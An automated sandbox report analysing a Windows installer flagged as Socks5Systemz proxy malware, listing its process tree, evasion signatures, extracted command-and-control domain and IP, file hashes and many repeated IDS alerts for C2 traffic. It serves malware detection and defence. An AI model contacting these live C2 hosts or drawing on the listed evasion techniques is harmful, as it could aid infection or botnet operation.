Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1509605
MD5:984c885de9fea28a60a25b278f424f50
SHA1:5971c05829104cb0dd47de9fb8806762c141f081
SHA256:5fe11452c901b9eb15809a33ecc6bb94c9d1ec87553708eac94ad19969cbaa8c
Tags:exeSocks5Systemz
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 984C885DE9FEA28A60A25B278F424F50)
    • file.tmp (PID: 6548 cmdline: "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe" MD5: F02C8C4B73C31FD56FD90DC77235363B)
      • batchaviconverter32_64.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i MD5: 91646D419442B59CE172BCBAE8A2A8C9)
  • svchost.exe (PID: 7152 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["bwdroig.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: batchaviconverter32_64.exe PID: 3220JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        Sigma Signatures

        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 7152, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-11T21:05:56.592753+020020494671A Network Trojan was detected192.168.2.549694185.196.8.21480TCP
        2024-09-11T21:05:56.945730+020020494671A Network Trojan was detected192.168.2.549694185.196.8.21480TCP
        2024-09-11T21:05:57.759019+020020494671A Network Trojan was detected192.168.2.549695185.196.8.21480TCP
        2024-09-11T21:05:58.587230+020020494671A Network Trojan was detected192.168.2.549696185.196.8.21480TCP
        2024-09-11T21:05:59.436703+020020494671A Network Trojan was detected192.168.2.549698185.196.8.21480TCP
        2024-09-11T21:05:59.808909+020020494671A Network Trojan was detected192.168.2.549698185.196.8.21480TCP
        2024-09-11T21:06:00.173237+020020494671A Network Trojan was detected192.168.2.549698185.196.8.21480TCP
        2024-09-11T21:06:04.025367+020020494671A Network Trojan was detected192.168.2.549699185.196.8.21480TCP
        2024-09-11T21:06:04.856670+020020494671A Network Trojan was detected192.168.2.549700185.196.8.21480TCP
        2024-09-11T21:06:05.212808+020020494671A Network Trojan was detected192.168.2.549700185.196.8.21480TCP
        2024-09-11T21:06:06.172922+020020494671A Network Trojan was detected192.168.2.549701185.196.8.21480TCP
        2024-09-11T21:06:07.015813+020020494671A Network Trojan was detected192.168.2.549705185.196.8.21480TCP
        2024-09-11T21:06:07.862918+020020494671A Network Trojan was detected192.168.2.549706185.196.8.21480TCP
        2024-09-11T21:06:08.685168+020020494671A Network Trojan was detected192.168.2.549708185.196.8.21480TCP
        2024-09-11T21:06:09.037740+020020494671A Network Trojan was detected192.168.2.549708185.196.8.21480TCP
        2024-09-11T21:06:09.851395+020020494671A Network Trojan was detected192.168.2.549710185.196.8.21480TCP
        2024-09-11T21:06:11.069617+020020494671A Network Trojan was detected192.168.2.549711185.196.8.21480TCP
        2024-09-11T21:06:11.896319+020020494671A Network Trojan was detected192.168.2.549712185.196.8.21480TCP
        2024-09-11T21:06:12.773663+020020494671A Network Trojan was detected192.168.2.549713185.196.8.21480TCP
        2024-09-11T21:06:13.605918+020020494671A Network Trojan was detected192.168.2.549714185.196.8.21480TCP
        2024-09-11T21:06:14.458614+020020494671A Network Trojan was detected192.168.2.549715185.196.8.21480TCP
        2024-09-11T21:06:15.308093+020020494671A Network Trojan was detected192.168.2.549716185.196.8.21480TCP
        2024-09-11T21:06:15.657816+020020494671A Network Trojan was detected192.168.2.549716185.196.8.21480TCP
        2024-09-11T21:06:16.511272+020020494671A Network Trojan was detected192.168.2.549717185.196.8.21480TCP
        2024-09-11T21:06:16.890327+020020494671A Network Trojan was detected192.168.2.549717185.196.8.21480TCP
        2024-09-11T21:06:17.260660+020020494671A Network Trojan was detected192.168.2.549717185.196.8.21480TCP
        2024-09-11T21:06:18.082965+020020494671A Network Trojan was detected192.168.2.549718185.196.8.21480TCP
        2024-09-11T21:06:18.905971+020020494671A Network Trojan was detected192.168.2.549719185.196.8.21480TCP
        2024-09-11T21:06:19.748752+020020494671A Network Trojan was detected192.168.2.549720185.196.8.21480TCP
        2024-09-11T21:06:20.096601+020020494671A Network Trojan was detected192.168.2.549720185.196.8.21480TCP
        2024-09-11T21:06:20.936229+020020494671A Network Trojan was detected192.168.2.549721185.196.8.21480TCP
        2024-09-11T21:06:21.296599+020020494671A Network Trojan was detected192.168.2.549721185.196.8.21480TCP
        2024-09-11T21:06:22.198017+020020494671A Network Trojan was detected192.168.2.549722185.196.8.21480TCP
        2024-09-11T21:06:22.998760+020020494671A Network Trojan was detected192.168.2.549723185.196.8.21480TCP
        2024-09-11T21:06:23.356736+020020494671A Network Trojan was detected192.168.2.549723185.196.8.21480TCP
        2024-09-11T21:06:23.709679+020020494671A Network Trojan was detected192.168.2.549723185.196.8.21480TCP
        2024-09-11T21:06:24.545349+020020494671A Network Trojan was detected192.168.2.549724185.196.8.21480TCP
        2024-09-11T21:06:24.913525+020020494671A Network Trojan was detected192.168.2.549724185.196.8.21480TCP
        2024-09-11T21:06:25.760563+020020494671A Network Trojan was detected192.168.2.549725185.196.8.21480TCP
        2024-09-11T21:06:26.218181+020020494671A Network Trojan was detected192.168.2.549725185.196.8.21480TCP
        2024-09-11T21:06:26.568628+020020494671A Network Trojan was detected192.168.2.549725185.196.8.21480TCP
        2024-09-11T21:06:27.422938+020020494671A Network Trojan was detected192.168.2.549726185.196.8.21480TCP
        2024-09-11T21:06:27.778832+020020494671A Network Trojan was detected192.168.2.549726185.196.8.21480TCP
        2024-09-11T21:06:28.137634+020020494671A Network Trojan was detected192.168.2.549726185.196.8.21480TCP
        2024-09-11T21:06:28.493940+020020494671A Network Trojan was detected192.168.2.549726185.196.8.21480TCP
        2024-09-11T21:06:29.319896+020020494671A Network Trojan was detected192.168.2.549727185.196.8.21480TCP
        2024-09-11T21:06:30.164158+020020494671A Network Trojan was detected192.168.2.549728185.196.8.21480TCP
        2024-09-11T21:06:31.118017+020020494671A Network Trojan was detected192.168.2.549729185.196.8.21480TCP
        2024-09-11T21:06:31.961080+020020494671A Network Trojan was detected192.168.2.549730185.196.8.21480TCP
        2024-09-11T21:06:33.084848+020020494671A Network Trojan was detected192.168.2.549731185.196.8.21480TCP
        2024-09-11T21:06:33.902633+020020494671A Network Trojan was detected192.168.2.549732185.196.8.21480TCP
        2024-09-11T21:06:34.288980+020020494671A Network Trojan was detected192.168.2.549732185.196.8.21480TCP
        2024-09-11T21:06:35.098906+020020494671A Network Trojan was detected192.168.2.549733185.196.8.21480TCP
        2024-09-11T21:06:35.918371+020020494671A Network Trojan was detected192.168.2.549734185.196.8.21480TCP
        2024-09-11T21:06:36.274434+020020494671A Network Trojan was detected192.168.2.549734185.196.8.21480TCP
        2024-09-11T21:06:37.246858+020020494671A Network Trojan was detected192.168.2.549735185.196.8.21480TCP
        2024-09-11T21:06:37.594424+020020494671A Network Trojan was detected192.168.2.549735185.196.8.21480TCP
        2024-09-11T21:06:37.940100+020020494671A Network Trojan was detected192.168.2.549735185.196.8.21480TCP
        2024-09-11T21:06:38.788211+020020494671A Network Trojan was detected192.168.2.549736185.196.8.21480TCP
        2024-09-11T21:06:39.632773+020020494671A Network Trojan was detected192.168.2.549737185.196.8.21480TCP
        2024-09-11T21:06:40.485386+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:40.839571+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:41.199616+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:41.796373+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:42.152596+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:42.687249+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:43.040861+020020494671A Network Trojan was detected192.168.2.549738185.196.8.21480TCP
        2024-09-11T21:06:43.864891+020020494671A Network Trojan was detected192.168.2.549739185.196.8.21480TCP
        2024-09-11T21:06:44.711438+020020494671A Network Trojan was detected192.168.2.549740185.196.8.21480TCP
        2024-09-11T21:06:45.545838+020020494671A Network Trojan was detected192.168.2.549741185.196.8.21480TCP
        2024-09-11T21:06:45.897834+020020494671A Network Trojan was detected192.168.2.549741185.196.8.21480TCP
        2024-09-11T21:06:46.723627+020020494671A Network Trojan was detected192.168.2.549742185.196.8.21480TCP
        2024-09-11T21:06:47.539506+020020494671A Network Trojan was detected192.168.2.549743185.196.8.21480TCP
        2024-09-11T21:06:48.660925+020020494671A Network Trojan was detected192.168.2.549744185.196.8.21480TCP
        2024-09-11T21:06:49.481618+020020494671A Network Trojan was detected192.168.2.549745185.196.8.21480TCP
        2024-09-11T21:06:50.341493+020020494671A Network Trojan was detected192.168.2.549746185.196.8.21480TCP
        2024-09-11T21:06:50.706826+020020494671A Network Trojan was detected192.168.2.549746185.196.8.21480TCP
        2024-09-11T21:06:51.549357+020020494671A Network Trojan was detected192.168.2.549747185.196.8.21480TCP
        2024-09-11T21:06:52.389623+020020494671A Network Trojan was detected192.168.2.549748185.196.8.21480TCP
        2024-09-11T21:06:53.198866+020020494671A Network Trojan was detected192.168.2.549749185.196.8.21480TCP
        2024-09-11T21:06:53.551402+020020494671A Network Trojan was detected192.168.2.549749185.196.8.21480TCP
        2024-09-11T21:06:54.402867+020020494671A Network Trojan was detected192.168.2.549750185.196.8.21480TCP
        2024-09-11T21:06:54.765378+020020494671A Network Trojan was detected192.168.2.549750185.196.8.21480TCP
        2024-09-11T21:06:55.585127+020020494671A Network Trojan was detected192.168.2.549751185.196.8.21480TCP
        2024-09-11T21:06:56.428401+020020494671A Network Trojan was detected192.168.2.549752185.196.8.21480TCP
        2024-09-11T21:06:57.264250+020020494671A Network Trojan was detected192.168.2.549753185.196.8.21480TCP
        2024-09-11T21:06:58.076172+020020494671A Network Trojan was detected192.168.2.549754185.196.8.21480TCP
        2024-09-11T21:06:58.906526+020020494671A Network Trojan was detected192.168.2.549755185.196.8.21480TCP
        2024-09-11T21:06:59.848506+020020494671A Network Trojan was detected192.168.2.549756185.196.8.21480TCP
        2024-09-11T21:07:00.991707+020020494671A Network Trojan was detected192.168.2.549757185.196.8.21480TCP
        2024-09-11T21:07:01.839737+020020494671A Network Trojan was detected192.168.2.549758185.196.8.21480TCP
        2024-09-11T21:07:02.669331+020020494671A Network Trojan was detected192.168.2.549759185.196.8.21480TCP
        2024-09-11T21:07:03.550461+020020494671A Network Trojan was detected192.168.2.549760185.196.8.21480TCP
        2024-09-11T21:07:04.444123+020020494671A Network Trojan was detected192.168.2.549761185.196.8.21480TCP
        2024-09-11T21:07:05.339435+020020494671A Network Trojan was detected192.168.2.549762185.196.8.21480TCP
        2024-09-11T21:07:06.175896+020020494671A Network Trojan was detected192.168.2.549763185.196.8.21480TCP
        2024-09-11T21:07:07.004269+020020494671A Network Trojan was detected192.168.2.549764185.196.8.21480TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: batchaviconverter32_64.exe.3220.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["bwdroig.com"]}
        Multi AV Scanner detection for submitted file
        Source: file.exeReversingLabs: Detection: 15%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeUnpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Batch AVI Converter_is1Jump to behavior
        Source: Binary string: msvcp71.pdbx# source: is-0D2S5.tmp.1.dr
        Source: Binary string: msvcr71.pdb< source: is-O4BPT.tmp.1.dr
        Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-7PIOL.tmp.1.dr
        Source: Binary string: msvcp71.pdb source: is-0D2S5.tmp.1.dr
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000002.3334319199.000000000068E000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091477293.0000000003140000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091585886.00000000021F8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3334991666.0000000002373000.00000002.00000001.01000000.00000007.sdmp, _isdecmp.dll.1.dr
        Source: Binary string: msvcr71.pdb source: is-O4BPT.tmp.1.dr
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49718 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49713 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49710 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49726 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49724 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49720 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49717 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49747 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49712 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49699 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49705 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49744 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49734 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49756 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49727 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49730 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49740 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49714 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49751 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49736 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49731 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49696 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49733 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49745 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49749 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49698 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49694 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49695 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49750 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49721 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49753 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49760 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49742 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49741 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49743 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49706 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49737 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49700 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49728 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49748 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49715 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49761 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49735 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49763 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49739 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49711 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49701 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49719 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49708 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49757 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49764 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49752 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49759 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49762 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49758 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49746 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49716 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49729 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49755 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49754 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49732 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49723 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49722 -> 185.196.8.214:80
